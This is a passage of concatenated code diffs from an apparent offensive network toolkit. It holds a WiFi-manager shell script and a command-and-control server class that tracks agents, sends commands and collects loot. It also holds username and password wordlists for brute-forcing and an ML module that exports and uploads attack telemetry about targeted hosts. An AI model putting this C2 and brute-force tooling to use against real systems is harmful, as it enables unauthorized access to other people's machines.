chmod 600 "/etc/NetworkManager/system-connections/$conn_name.nmconnection"
# Reload NetworkManager connections
nmcli connection reload
# Bring the connection up
nmcli connection up "$conn_name"
if [ $? -eq 0 ]; then
log "INFO" "Successfully recreated and connected to '$conn_name'."
else
log "ERROR" "Failed to recreate and connect to '$conn_name'."
fi
echo ""
read -p "Press Enter to return to the Manage WiFi Connections menu..."
;;
4)
log "INFO" "Returning to Main Menu."
return
;;
*)
log "ERROR" "Invalid option."
sleep 2
;;
esac
done
}
# ============================================================
# Function to Force Refresh WiFi Connections
# ============================================================
force_refresh_wifi_connections() {
log "INFO" "Refreshing WiFi connections..."
nmcli connection reload
# Identify the WiFi device (e.g., wlan0, wlp2s0)
wifi_device=$(nmcli device status | awk '$2 == "wifi" {print $1}')
if [ -n "$wifi_device" ]; then
nmcli device disconnect "$wifi_device"
nmcli device connect "$wifi_device"
log "INFO" "WiFi connections have been refreshed."
else
log "WARN" "No WiFi device found to refresh."
fi
echo ""
read -p "Press Enter to return to the menu..."
}
# ============================================================
# Function to Display the Main Menu
# ============================================================
display_main_menu() {
while true; do
clear
echo -e "${BLUE}╔════════════════════════════════════════╗${NC}"
echo -e "${BLUE}║ Wifi Manager Menu by Infinition ║${NC}"
echo -e "${BLUE}╠════════════════════════════════════════╣${NC}"
echo -e "${BLUE}${NC} 1. List Available WiFi Networks ${BLUE}${NC}"
echo -e "${BLUE}${NC} 2. Show Current WiFi Status ${BLUE}${NC}"
echo -e "${BLUE}${NC} 3. Add a New WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 4. Delete a WiFi Connection ${BLUE}${NC}"
echo -e "${BLUE}${NC} 5. Clear All Saved WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 6. Manage WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 7. Force Refresh WiFi Connections ${BLUE}${NC}"
echo -e "${BLUE}${NC} 8. Exit ${BLUE}${NC}"
echo -e "${BLUE}╚════════════════════════════════════════╝${NC}"
echo -e "Note: Ensure your WiFi adapter is enabled."
echo -e "${YELLOW}Usage: $0 [OPTIONS] (use -h for help)${NC}"
echo -n -e "${GREEN}Please choose an option (1-8): ${NC}"
read choice
case $choice in
1)
list_wifi_and_connect
;;
2)
show_wifi_status
;;
3)
add_wifi_connection
;;
4)
delete_wifi_connection
;;
5)
clear_all_connections
;;
6)
manage_wifi_connections
;;
7)
force_refresh_wifi_connections
;;
8)
log "INFO" "Exiting Wifi Manager. Goodbye!"
exit 0
;;
*)
log "ERROR" "Invalid option. Please choose between 1-8."
sleep 2
;;
esac
done
}
# ============================================================
# Process Command Line Arguments
# ============================================================
while getopts "hfclsadm" opt; do
case $opt in
h)
show_usage
;;
f)
force_refresh_wifi_connections
exit 0
;;
c)
clear_all_connections
exit 0
;;
l)
list_wifi_and_connect
exit 0
;;
s)
show_wifi_status
exit 0
;;
a)
add_wifi_connection
exit 0
;;
d)
delete_wifi_connection
exit 0
;;
m)
manage_wifi_connections
exit 0
;;
\?)
log "ERROR" "Invalid option: -$OPTARG"
show_usage
;;
esac
done
# ============================================================
# Check Prerequisites Before Starting
# ============================================================
check_prerequisites
# ============================================================
# Handle preconfigured.nmconnection if Exists
# ============================================================
handle_preconfigured_connection
# ============================================================
# Start the Main Menu
# ============================================================
display_main_menu

View File

@@ -612,6 +612,7 @@ class C2Manager:
self._server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self._server_socket.bind((self.bind_ip, self.bind_port))
self._server_socket.listen(128)
self._server_socket.settimeout(1.0)
# Start accept thread
self._running = True
@@ -631,6 +632,12 @@ class C2Manager:
except Exception as e:
self.logger.error(f"Failed to start C2 server: {e}")
if self._server_socket:
try:
self._server_socket.close()
except Exception:
pass
self._server_socket = None
self._running = False
return {"status": "error", "message": str(e)}
@@ -647,6 +654,12 @@ class C2Manager:
self._server_socket.close()
self._server_socket = None
if self._server_thread and self._server_thread.is_alive():
self._server_thread.join(timeout=3.0)
if self._server_thread.is_alive():
self.logger.warning("C2 accept thread did not exit cleanly")
self._server_thread = None
# Disconnect all clients
with self._lock:
for client_id in list(self._clients.keys()):
@@ -774,7 +787,7 @@ class C2Manager:
for row in rows:
agent_id = row["id"]
# Conversion last_seen timestamp ms
# Conversion last_seen -> timestamp ms
last_seen_raw = row.get("last_seen")
last_seen_epoch = None
if last_seen_raw:
@@ -803,7 +816,7 @@ class C2Manager:
"tags": []
}
# --- 2) Écraser si agent en mémoire (connecté) ---
# If connected in memory, prefer live telemetry values.
if agent_id in self._clients:
info = self._clients[agent_id]["info"]
agent_info.update({
@@ -816,10 +829,10 @@ class C2Manager:
"disk": info.get("disk_percent", 0),
"ip": info.get("ip_address", agent_info["ip"]),
"uptime": info.get("uptime", 0),
"last_seen": int(datetime.utcnow().timestamp() * 1000), # en ms
"last_seen": int(datetime.utcnow().timestamp() * 1000),
})
# --- 3) Vérifier si trop vieux → offline ---
# Mark stale clients as offline.
if agent_info["last_seen"]:
delta = (now.timestamp() * 1000) - agent_info["last_seen"]
if delta > OFFLINE_THRESHOLD * 1000:
@@ -827,33 +840,30 @@ class C2Manager:
agents.append(agent_info)
# Déduplication par hostname (ou id fallback) : on garde le plus récent et on
# privilégie un statut online par rapport à offline.
dedup = {}
for a in agents:
key = (a.get('hostname') or a['id']).strip().lower()
prev = dedup.get(key)
if not prev:
dedup[key] = a
continue
# Deduplicate by hostname (or id fallback), preferring healthier/recent entries.
dedup = {}
for a in agents:
key = (a.get("hostname") or a["id"]).strip().lower()
prev = dedup.get(key)
if not prev:
dedup[key] = a
continue
def rank(status): # online < idle < offline
return {'online': 0, 'idle': 1, 'offline': 2}.get(status, 3)
def rank(status):
return {"online": 0, "idle": 1, "offline": 2}.get(status, 3)
better = False
if rank(a['status']) < rank(prev['status']):
better = False
if rank(a["status"]) < rank(prev["status"]):
better = True
else:
la = a.get("last_seen") or 0
lp = prev.get("last_seen") or 0
if la > lp:
better = True
else:
la = a.get('last_seen') or 0
lp = prev.get('last_seen') or 0
if la > lp:
better = True
if better:
dedup[key] = a
if better:
dedup[key] = a
return list(dedup.values())
return agents
return list(dedup.values())
def send_command(self, targets: List[str], command: str) -> dict:
"""Send command to specific agents"""
@@ -1060,6 +1070,8 @@ class C2Manager:
args=(sock, addr),
daemon=True
).start()
except socket.timeout:
continue
except OSError:
break # Server socket closed
except Exception as e:
@@ -1159,10 +1171,19 @@ class C2Manager:
def _receive_from_client(self, sock: socket.socket, cipher: Fernet) -> Optional[dict]:
try:
# OPTIMIZATION: Set timeout to prevent threads hanging forever
sock.settimeout(15.0)
header = sock.recv(4)
if not header or len(header) != 4:
return None
length = struct.unpack(">I", header)[0]
# Memory protection: prevent massive data payloads
if length > 10 * 1024 * 1024:
self.logger.warning(f"Rejecting oversized message: {length} bytes")
return None
data = b""
while len(data) < length:
chunk = sock.recv(min(4096, length - len(data)))
@@ -1172,13 +1193,11 @@ class C2Manager:
decrypted = cipher.decrypt(data)
return json.loads(decrypted.decode())
except (OSError, ConnectionResetError, BrokenPipeError):
# socket fermé/abandonné → None = déconnexion propre
return None
except Exception as e:
self.logger.error(f"Receive error: {e}")
return None
def _send_to_client(self, client_id: str, command: str):
with self._lock:
client = self._clients.get(client_id)
@@ -1191,8 +1210,6 @@ class C2Manager:
header = struct.pack(">I", len(encrypted))
sock.sendall(header + encrypted)
def _process_client_message(self, client_id: str, data: dict):
with self._lock:
if client_id not in self._clients:
@@ -1212,16 +1229,17 @@ class C2Manager:
elif 'telemetry' in data:
telemetry = data['telemetry']
with self._lock:
# OPTIMIZATION: Prune telemetry fields kept in-memory
client_info.update({
'hostname': telemetry.get('hostname'),
'platform': telemetry.get('platform'),
'os': telemetry.get('os'),
'os_version': telemetry.get('os_version'),
'architecture': telemetry.get('architecture'),
'cpu_percent': telemetry.get('cpu_percent', 0),
'mem_percent': telemetry.get('mem_percent', 0),
'disk_percent': telemetry.get('disk_percent', 0),
'uptime': telemetry.get('uptime', 0)
'hostname': str(telemetry.get('hostname', ''))[:64],
'platform': str(telemetry.get('platform', ''))[:32],
'os': str(telemetry.get('os', ''))[:32],
'os_version': str(telemetry.get('os_version', ''))[:64],
'architecture': str(telemetry.get('architecture', ''))[:16],
'cpu_percent': float(telemetry.get('cpu_percent', 0)),
'mem_percent': float(telemetry.get('mem_percent', 0)),
'disk_percent': float(telemetry.get('disk_percent', 0)),
'uptime': float(telemetry.get('uptime', 0))
})
self.db.save_telemetry(client_id, telemetry)
self.bus.emit({"type": "telemetry", "id": client_id, **telemetry})
@@ -1230,7 +1248,6 @@ class C2Manager:
self._handle_loot(client_id, data['download'])
elif 'result' in data:
result = data['result']
# >>> ici on enregistre avec la vraie commande
self.db.save_command(client_id, last_cmd or '<unknown>', result, True)
self.bus.emit({"type": "console", "target": client_id, "text": str(result), "kind": "RX"})
@@ -1329,3 +1346,6 @@ class C2Manager:
# ========== Global Instance ==========
c2_manager = C2Manager()

View File

@@ -280,19 +280,23 @@ class CommentAI:
if not rows:
return None
# Weighted selection pool
pool: List[str] = []
# Weighted selection using random.choices (no temporary list expansion)
texts: List[str] = []
weights: List[int] = []
for row in rows:
try:
w = int(_row_get(row, "weight", 1)) or 1
except Exception:
w = 1
w = max(1, w)
text = _row_get(row, "text", "")
if text:
pool.extend([text] * w)
try:
w = int(_row_get(row, "weight", 1)) or 1
except Exception:
w = 1
texts.append(text)
weights.append(max(1, w))
chosen = random.choice(pool) if pool else _row_get(rows[0], "text", None)
if texts:
chosen = random.choices(texts, weights=weights, k=1)[0]
else:
chosen = _row_get(rows[0], "text", None)
# Templates {var}
if chosen and params:
@@ -315,6 +319,9 @@ class CommentAI:
"""
Return a comment if status changed or delay expired.
When llm_comments_enabled=True in config, tries LLM first;
falls back to the database/template system on any failure.
Args:
status: logical status name (e.g., "IDLE", "SSHBruteforce", "NetworkScanner").
lang: language override (e.g., "fr"); if None, auto priority is used.
@@ -327,14 +334,36 @@ class CommentAI:
status = status or "IDLE"
status_changed = (status != self.last_status)
if status_changed or (current_time - self.last_comment_time >= self.comment_delay):
if not status_changed and (current_time - self.last_comment_time < self.comment_delay):
return None
# --- Try LLM if enabled ---
text: Optional[str] = None
llm_generated = False
if getattr(self.shared_data, "llm_comments_enabled", False):
try:
from llm_bridge import LLMBridge
text = LLMBridge().generate_comment(status, params)
if text:
llm_generated = True
except Exception as e:
logger.debug(f"LLM comment failed, using fallback: {e}")
# --- Fallback: database / template system (original behaviour) ---
if not text:
text = self._pick_text(status, lang, params)
if text:
self.last_status = status
self.last_comment_time = current_time
self.comment_delay = self._new_delay()
logger.debug(f"Next comment delay: {self.comment_delay}s")
return text
if text:
self.last_status = status
self.last_comment_time = current_time
self.comment_delay = self._new_delay()
logger.debug(f"Next comment delay: {self.comment_delay}s")
# Log comments
if llm_generated:
logger.info(f"[LLM_COMMENT] ({status}) {text}")
else:
logger.info(f"[COMMENT] ({status}) {text}")
return text
return None

View File

@@ -1,7 +1,16 @@
root
admin
bjorn
MqUG09FmPb
OD1THT4mKMnlt2M$
letmein
QZKOJDBEJf
ZrXqzIlZk3
9XP5jT3gwJjmvULK
password
toor
1234
123456
9Pbc8RjB5s
fcQRQUxnZl
Jzp0G7kolyloIk7g
DyMuqqfGYj
G8tCoDFNIM
8gv1j!vubL20xCH$
i5z1nlF3Uf
zkg3ojoCoKAHaPo%
oWcK1Zmkve

View File

@@ -1,3 +1,8 @@
manager
root
admin
bjorn
db_audit
dev
user
boss
deploy

913
data_consolidator.py Normal file
View File

@@ -0,0 +1,913 @@
"""
data_consolidator.py - Data Consolidation Engine for Deep Learning
═══════════════════════════════════════════════════════════════════════════
Purpose:
Consolidate logged features into training-ready datasets.
Prepare data exports for deep learning on external PC.
Features:
- Aggregate features across time windows
- Compute statistical features
- Create feature vectors for neural networks
- Export in formats ready for TensorFlow/PyTorch
- Incremental consolidation (low memory footprint)
Author: Bjorn Team
Version: 2.0.0
"""
import json
import csv
import time
import gzip
import heapq
from datetime import datetime, timedelta
from typing import Dict, List, Any, Optional, Tuple
from pathlib import Path
from logger import Logger
logger = Logger(name="data_consolidator.py", level=20)
try:
import requests
except ImportError:
requests = None
class DataConsolidator:
"""
Consolidates raw feature logs into training datasets.
Optimized for Raspberry Pi Zero - processes in batches.
"""
def __init__(self, shared_data, export_dir: str = None):
"""
Initialize data consolidator
Args:
shared_data: SharedData instance
export_dir: Directory for export files
"""
self.shared_data = shared_data
self.db = shared_data.db
if export_dir is None:
# Default to shared_data path (cross-platform)
self.export_dir = Path(getattr(shared_data, 'ml_exports_dir', Path(shared_data.data_dir) / "ml_exports"))
else:
self.export_dir = Path(export_dir)
self.export_dir.mkdir(parents=True, exist_ok=True)
# Server health state consumed by orchestrator fallback logic.
self.last_server_attempted = False
self.last_server_contact_ok = None
self._upload_backoff_until = 0.0
self._upload_backoff_current_s = 0.0
# AI-01: Feature variance tracking for dimensionality reduction
self._feature_variance_min = float(
getattr(shared_data, 'ai_feature_selection_min_variance', 0.001)
)
# Accumulator: {feature_name: [sum, sum_of_squares, count]}
self._feature_stats = {}
logger.info(f"DataConsolidator initialized, exports: {self.export_dir}")
def _set_server_contact_state(self, attempted: bool, ok: Optional[bool]) -> None:
self.last_server_attempted = bool(attempted)
self.last_server_contact_ok = ok if attempted else None
def _apply_upload_backoff(self, base_backoff_s: int, max_backoff_s: int = 3600) -> int:
"""
Exponential upload retry backoff:
base -> base*2 -> base*4 ... capped at max_backoff_s.
Returns the delay (seconds) applied for the next retry window.
"""
base = max(10, int(base_backoff_s))
cap = max(base, int(max_backoff_s))
prev = float(getattr(self, "_upload_backoff_current_s", 0.0) or 0.0)
if prev <= 0:
delay = base
else:
delay = min(cap, max(base, int(prev * 2)))
self._upload_backoff_current_s = float(delay)
self._upload_backoff_until = time.monotonic() + delay
return int(delay)
# ═══════════════════════════════════════════════════════════════════════
# CONSOLIDATION ENGINE
# ═══════════════════════════════════════════════════════════════════════
def consolidate_features(
self,
batch_size: int = None,
max_batches: Optional[int] = None
) -> Dict[str, int]:
"""
Consolidate raw features into aggregated feature vectors.
Processes unconsolidated records in batches.
"""
if batch_size is None:
batch_size = int(getattr(self.shared_data, "ai_batch_size", 100))
batch_size = max(1, min(int(batch_size), 5000))
stats = {
'records_processed': 0,
'records_aggregated': 0,
'batches_completed': 0,
'errors': 0
}
try:
# Get unconsolidated records
unconsolidated = self.db.query("""
SELECT COUNT(*) as cnt
FROM ml_features
WHERE consolidated=0
""")[0]['cnt']
if unconsolidated == 0:
logger.info("No unconsolidated features to process")
return stats
logger.info(f"Consolidating {unconsolidated} feature records...")
batch_count = 0
while True:
if max_batches and batch_count >= max_batches:
break
# Fetch batch
batch = self.db.query(f"""
SELECT * FROM ml_features
WHERE consolidated=0
ORDER BY timestamp
LIMIT {batch_size}
""")
if not batch:
break
# Process batch
for record in batch:
try:
self._consolidate_single_record(record)
stats['records_processed'] += 1
except Exception as e:
logger.error(f"Error consolidating record {record['id']}: {e}")
stats['errors'] += 1
# Mark as consolidated
record_ids = [r['id'] for r in batch]
placeholders = ','.join('?' * len(record_ids))
self.db.execute(f"""
UPDATE ml_features
SET consolidated=1
WHERE id IN ({placeholders})
""", record_ids)
stats['batches_completed'] += 1
batch_count += 1
# Progress log
if batch_count % 10 == 0:
logger.info(
f"Consolidation progress: {stats['records_processed']} records, "
f"{stats['batches_completed']} batches"
)
logger.success(
f"Consolidation complete: {stats['records_processed']} records processed, "
f"{stats['errors']} errors"
)
except Exception as e:
logger.error(f"Consolidation failed: {e}")
stats['errors'] += 1
return stats
def _consolidate_single_record(self, record: Dict[str, Any]):
"""
Process a single feature record into aggregated form.
Computes statistical features and feature vectors.
"""
try:
# Parse JSON fields once — reused by _build_feature_vector to avoid double-parsing
host_features = json.loads(record.get('host_features', '{}'))
network_features = json.loads(record.get('network_features', '{}'))
temporal_features = json.loads(record.get('temporal_features', '{}'))
action_features = json.loads(record.get('action_features', '{}'))
# Combine all features
all_features = {
**host_features,
**network_features,
**temporal_features,
**action_features
}
# Build numerical feature vector — pass already-parsed dicts to avoid re-parsing
feature_vector = self._build_feature_vector(
host_features, network_features, temporal_features, action_features
)
# AI-01: Track feature variance for dimensionality reduction
self._track_feature_variance(feature_vector)
# Determine time window
raw_ts = record['timestamp']
if isinstance(raw_ts, str):
try:
timestamp = datetime.fromisoformat(raw_ts)
except ValueError:
timestamp = datetime.now()
elif isinstance(raw_ts, datetime):
timestamp = raw_ts
else:
timestamp = datetime.now()
hourly_window = timestamp.replace(minute=0, second=0, microsecond=0).isoformat()
# Update or insert aggregated record
self._update_aggregated_features(
mac_address=record['mac_address'],
time_window='hourly',
timestamp=hourly_window,
action_name=record['action_name'],
success=record['success'],
duration=record['duration_seconds'],
reward=record['reward'],
feature_vector=feature_vector,
all_features=all_features
)
except Exception as e:
logger.error(f"Error consolidating single record: {e}")
raise
def _build_feature_vector(
self,
host_features: Dict[str, Any],
network_features: Dict[str, Any],
temporal_features: Dict[str, Any],
action_features: Dict[str, Any],
) -> Dict[str, float]:
"""
Build a named feature dictionary from already-parsed feature dicts.
Accepts pre-parsed dicts so JSON is never decoded twice per record.
Uses shared ai_utils for consistency.
"""
from ai_utils import extract_neural_features_dict
return extract_neural_features_dict(
host_features=host_features,
network_features=network_features,
temporal_features=temporal_features,
action_features=action_features,
)
def _update_aggregated_features(
self,
mac_address: str,
time_window: str,
timestamp: str,
action_name: str,
success: int,
duration: float,
reward: float,
feature_vector: Dict[str, float],
all_features: Dict[str, Any]
):
"""
Update or insert aggregated feature record.
Accumulates statistics over the time window.
"""
try:
# Check if record exists
existing = self.db.query("""
SELECT * FROM ml_features_aggregated
WHERE mac_address=? AND time_window=? AND computed_at=?
""", (mac_address, time_window, timestamp))
if existing:
# Update existing record
old = existing[0]
new_total = old['total_actions'] + 1
# ... typical stats update ...
# Merge feature vectors (average each named feature)
old_vector = json.loads(old['feature_vector']) # Now a Dict
if isinstance(old_vector, list): # Migration handle
old_vector = {}
merged_vector = {}
# Combine keys from both
all_keys = set(old_vector.keys()) | set(feature_vector.keys())
for k in all_keys:
v_old = old_vector.get(k, 0.0)
v_new = feature_vector.get(k, 0.0)
merged_vector[k] = (v_old * old['total_actions'] + v_new) / new_total
self.db.execute("""
UPDATE ml_features_aggregated
SET total_actions=total_actions+1,
success_rate=(success_rate*total_actions + ?)/(total_actions+1),
avg_duration=(avg_duration*total_actions + ?)/(total_actions+1),
total_reward=total_reward + ?,
feature_vector=?
WHERE mac_address=? AND time_window=? AND computed_at=?
""", (
success,
duration,
reward,
json.dumps(merged_vector),
mac_address,
time_window,
timestamp
))
else:
# Insert new record
self.db.execute("""
INSERT INTO ml_features_aggregated (
mac_address, time_window, computed_at,
total_actions, success_rate, avg_duration, total_reward,
feature_vector
) VALUES (?, ?, ?, 1, ?, ?, ?, ?)
""", (
mac_address,
time_window,
timestamp,
float(success),
duration,
reward,
json.dumps(feature_vector)
))
except Exception as e:
logger.error(f"Error updating aggregated features: {e}")
raise
# ═══════════════════════════════════════════════════════════════════════
# AI-01: FEATURE VARIANCE TRACKING & SELECTION
# ═══════════════════════════════════════════════════════════════════════
def _track_feature_variance(self, feature_vector: Dict[str, float]):
"""
Update running statistics (mean, variance) for each feature.
Uses Welford's online algorithm via sum/sum_sq/count.
"""
for name, value in feature_vector.items():
try:
val = float(value)
except (TypeError, ValueError):
continue
if name not in self._feature_stats:
self._feature_stats[name] = [0.0, 0.0, 0]
stats = self._feature_stats[name]
stats[0] += val # sum
stats[1] += val * val # sum of squares
stats[2] += 1 # count
def _get_feature_variances(self) -> Dict[str, float]:
"""Return computed variance for each tracked feature."""
variances = {}
for name, (s, sq, n) in self._feature_stats.items():
if n < 2:
variances[name] = 0.0
else:
mean = s / n
variances[name] = max(0.0, sq / n - mean * mean)
return variances
def _get_selected_features(self) -> List[str]:
"""Return feature names that pass the minimum variance threshold."""
threshold = self._feature_variance_min
variances = self._get_feature_variances()
selected = [name for name, var in variances.items() if var >= threshold]
dropped = len(variances) - len(selected)
if dropped > 0:
logger.info(
f"Feature selection: kept {len(selected)}/{len(variances)} features "
f"(dropped {dropped} near-zero variance < {threshold})"
)
return sorted(selected)
def _write_feature_manifest(self, selected_features: List[str], export_filepath: str):
"""Write feature_manifest.json alongside the export file."""
try:
variances = self._get_feature_variances()
manifest = {
'created_at': datetime.now().isoformat(),
'feature_count': len(selected_features),
'min_variance_threshold': self._feature_variance_min,
'features': {
name: {'variance': round(variances.get(name, 0.0), 6)}
for name in selected_features
},
'export_file': str(export_filepath),
}
manifest_path = self.export_dir / 'feature_manifest.json'
with open(manifest_path, 'w', encoding='utf-8') as f:
json.dump(manifest, f, indent=2)
logger.info(f"Feature manifest written: {manifest_path} ({len(selected_features)} features)")
except Exception as e:
logger.error(f"Failed to write feature manifest: {e}")
# ═══════════════════════════════════════════════════════════════════════
# EXPORT FUNCTIONS
# ═══════════════════════════════════════════════════════════════════════
def export_for_training(
self,
format: str = 'csv',
compress: bool = True,
max_records: Optional[int] = None
) -> Tuple[str, int]:
"""
Export consolidated features for deep learning training.
Args:
format: 'csv', 'jsonl', or 'parquet'
compress: Whether to gzip the output
max_records: Maximum records to export (None = all)
Returns:
Tuple of (file_path, record_count)
"""
try:
if max_records is None:
max_records = int(getattr(self.shared_data, "ai_export_max_records", 1000))
max_records = max(100, min(int(max_records), 20000))
# Generate filename
timestamp = datetime.now().strftime('%Y%m%d_%H%M%S')
base_filename = f"bjorn_training_{timestamp}.{format}"
if compress and format != 'parquet':
base_filename += '.gz'
filepath = self.export_dir / base_filename
# Fetch data
limit_clause = f"LIMIT {max_records}"
records = self.db.query(f"""
SELECT
mf.*,
mfa.feature_vector,
mfa.success_rate as aggregated_success_rate,
mfa.total_actions as aggregated_total_actions
FROM ml_features mf
LEFT JOIN ml_features_aggregated mfa
ON mf.mac_address = mfa.mac_address
WHERE mf.consolidated=1 AND mf.export_batch_id IS NULL
ORDER BY mf.timestamp DESC
{limit_clause}
""")
if not records:
logger.warning("No consolidated records to export")
return "", 0
# Extract IDs before export so we can free the records list early
record_ids = [r['id'] for r in records]
# Export based on format
if format == 'csv':
count = self._export_csv(records, filepath, compress)
elif format == 'jsonl':
count = self._export_jsonl(records, filepath, compress)
elif format == 'parquet':
count = self._export_parquet(records, filepath)
else:
raise ValueError(f"Unsupported format: {format}")
# Free the large records list immediately after export — record_ids is all we still need
del records
# AI-01: Write feature manifest with variance-filtered feature names
try:
selected = self._get_selected_features()
if selected:
self._write_feature_manifest(selected, str(filepath))
except Exception as e:
logger.error(f"Feature manifest generation failed: {e}")
# Create export batch record
batch_id = self._create_export_batch(filepath, count)
# Update records with batch ID
placeholders = ','.join('?' * len(record_ids))
self.db.execute(f"""
UPDATE ml_features
SET export_batch_id=?
WHERE id IN ({placeholders})
""", [batch_id] + record_ids)
del record_ids
logger.success(
f"Exported {count} records to {filepath} "
f"(batch_id={batch_id})"
)
return str(filepath), count
except Exception as e:
logger.error(f"Export failed: {e}")
raise
def _export_csv(
self,
records: List[Dict],
filepath: Path,
compress: bool
) -> int:
"""Export records as CSV"""
open_func = gzip.open if compress else open
mode = 'wt' if compress else 'w'
# 1. Flatten all records first to collect all possible fieldnames
flattened = []
all_fieldnames = set()
for r in records:
flat = {
'timestamp': r['timestamp'],
'mac_address': r['mac_address'],
'ip_address': r['ip_address'],
'action_name': r['action_name'],
'success': r['success'],
'duration_seconds': r['duration_seconds'],
'reward': r['reward']
}
# Parse and flatten features
for field in ['host_features', 'network_features', 'temporal_features', 'action_features']:
try:
features = json.loads(r.get(field, '{}'))
for k, v in features.items():
if isinstance(v, (int, float, bool, str)):
flat_key = f"{field}_{k}"
flat[flat_key] = v
except Exception as e:
logger.debug(f"Skip bad JSON in {field}: {e}")
# Add named feature vector
if r.get('feature_vector'):
try:
vector = json.loads(r['feature_vector'])
if isinstance(vector, dict):
for k, v in vector.items():
flat[f'feat_{k}'] = v
elif isinstance(vector, list):
for i, v in enumerate(vector):
flat[f'feature_{i}'] = v
except Exception as e:
logger.debug(f"Skip bad feature vector: {e}")
flattened.append(flat)
all_fieldnames.update(flat.keys())
# 2. Sort fieldnames for consistency
sorted_fieldnames = sorted(list(all_fieldnames))
all_fieldnames = None # Free the set
# 3. Write CSV
with open_func(filepath, mode, newline='', encoding='utf-8') as f:
if flattened:
writer = csv.DictWriter(f, fieldnames=sorted_fieldnames)
writer.writeheader()
writer.writerows(flattened)
count = len(flattened)
flattened = None # Free the expanded list
return count
def _export_jsonl(
self,
records: List[Dict],
filepath: Path,
compress: bool
) -> int:
"""Export records as JSON Lines"""
open_func = gzip.open if compress else open
mode = 'wt' if compress else 'w'
with open_func(filepath, mode, encoding='utf-8') as f:
for r in records:
# Avoid mutating `records` in place to keep memory growth predictable.
row = dict(r)
for field in ['host_features', 'network_features', 'temporal_features', 'action_features', 'raw_event']:
try:
row[field] = json.loads(row.get(field, '{}'))
except Exception:
row[field] = {}
if row.get('feature_vector'):
try:
row['feature_vector'] = json.loads(row['feature_vector'])
except Exception:
row['feature_vector'] = {}
f.write(json.dumps(row) + '\n')
return len(records)
def _export_parquet(self, records: List[Dict], filepath: Path) -> int:
"""Export records as Parquet (requires pyarrow)"""
try:
import pyarrow as pa
import pyarrow.parquet as pq
# Flatten records
flattened = []
for r in records:
flat = dict(r)
# Parse JSON fields
for field in ['host_features', 'network_features', 'temporal_features', 'action_features', 'raw_event']:
flat[field] = json.loads(r.get(field, '{}'))
if r.get('feature_vector'):
flat['feature_vector'] = json.loads(r['feature_vector'])
flattened.append(flat)
# Convert to Arrow table
table = pa.Table.from_pylist(flattened)
# Write parquet
pq.write_table(table, filepath, compression='snappy')
return len(records)
except ImportError:
logger.error("Parquet export requires pyarrow. Falling back to CSV.")
return self._export_csv(records, filepath.with_suffix('.csv'), compress=True)
def _create_export_batch(self, filepath: Path, count: int) -> int:
"""Create export batch record and return batch ID"""
result = self.db.execute("""
INSERT INTO ml_export_batches (file_path, record_count, status)
VALUES (?, ?, 'exported')
""", (str(filepath), count))
# Get the inserted ID
batch_id = self.db.query("SELECT last_insert_rowid() as id")[0]['id']
return batch_id
# ═══════════════════════════════════════════════════════════════════════
# UTILITY METHODS
# ═══════════════════════════════════════════════════════════════════════
def get_export_stats(self) -> Dict[str, Any]:
"""Get statistics about exports"""
try:
batches = self.db.query("""
SELECT COUNT(*) as total_batches,
SUM(record_count) as total_records,
MAX(created_at) as last_export
FROM ml_export_batches
WHERE status='exported'
""")[0]
pending = self.db.query("""
SELECT COUNT(*) as cnt
FROM ml_features
WHERE consolidated=1 AND export_batch_id IS NULL
""")[0]['cnt']
return {
'total_export_batches': batches.get('total_batches', 0),
'total_records_exported': batches.get('total_records', 0),
'last_export_time': batches.get('last_export'),
'pending_export_count': pending
}
except Exception as e:
logger.error(f"Error getting export stats: {e}")
return {}
def flush_pending_uploads(self, max_files: int = 3) -> int:
"""
Retry uploads for previously exported batches that were not transferred yet.
Returns the number of successfully transferred files.
"""
max_files = max(0, int(max_files))
if max_files <= 0:
return 0
# No heavy "reliquat" tracking needed: pending uploads = files present in export_dir.
files = self._list_pending_export_files(limit=max_files)
ok = 0
for fp in files:
if self.upload_to_server(fp):
ok += 1
else:
# Stop early when server is unreachable to avoid repeated noise.
if self.last_server_attempted and self.last_server_contact_ok is False:
break
return ok
def _list_pending_export_files(self, limit: int = 3) -> List[str]:
"""
Return oldest export files present in export_dir.
This makes the backlog naturally equal to the number of files on disk.
"""
limit = max(0, int(limit))
if limit <= 0:
return []
try:
d = Path(self.export_dir)
if not d.exists():
return []
def _safe_mtime(path: Path) -> float:
try:
return path.stat().st_mtime
except Exception:
return float("inf")
# Keep only the N oldest files in memory instead of sorting all candidates.
files_iter = (p for p in d.glob("bjorn_training_*") if p.is_file())
oldest = heapq.nsmallest(limit, files_iter, key=_safe_mtime)
return [str(p) for p in oldest]
except Exception:
return []
def _mark_batch_status(self, filepath: str, status: str, notes: str = "") -> None:
"""Update ml_export_batches status for a given file path (best-effort)."""
try:
self.db.execute(
"""
UPDATE ml_export_batches
SET status=?, notes=?
WHERE file_path=?
""",
(status, notes or "", str(filepath)),
)
except Exception:
pass
def _safe_delete_uploaded_export(self, filepath: Path) -> None:
"""Delete a successfully-uploaded export file if configured to do so."""
try:
if not bool(self.shared_data.config.get("ai_delete_export_after_upload", True)):
return
fp = filepath.resolve()
base = Path(self.export_dir).resolve()
# Safety: only delete files under export_dir.
if base not in fp.parents:
return
fp.unlink(missing_ok=True) # Python 3.8+ supports missing_ok
except TypeError:
# Python < 3.8 fallback (not expected here, but safe)
try:
if filepath.exists():
filepath.unlink()
except Exception:
pass
except Exception:
pass
def upload_to_server(self, filepath: str) -> bool:
"""
Upload export file to AI Validation Server.
Args:
filepath: Path to the file to upload
Returns:
True if upload successful
"""
self._set_server_contact_state(False, None)
try:
import requests
except ImportError:
requests = None
if requests is None:
logger.info_throttled(
"AI upload skipped: requests not installed",
key="ai_upload_no_requests",
interval_s=600.0,
)
return False
url = self.shared_data.config.get("ai_server_url")
if not url:
logger.info_throttled(
"AI upload skipped: ai_server_url not configured",
key="ai_upload_no_url",
interval_s=600.0,
)
return False
backoff_s = max(10, int(self.shared_data.config.get("ai_upload_retry_backoff_s", 120)))
max_backoff_s = 3600
now_mono = time.monotonic()
if now_mono < self._upload_backoff_until:
remaining = int(self._upload_backoff_until - now_mono)
logger.debug(f"AI upload backoff active ({remaining}s remaining)")
logger.info_throttled(
"AI upload deferred: backoff active",
key="ai_upload_backoff_active",
interval_s=180.0,
)
return False
try:
filepath = Path(filepath)
if not filepath.exists():
logger.warning(f"AI upload skipped: file not found: {filepath}")
self._mark_batch_status(str(filepath), "missing", "file not found")
return False
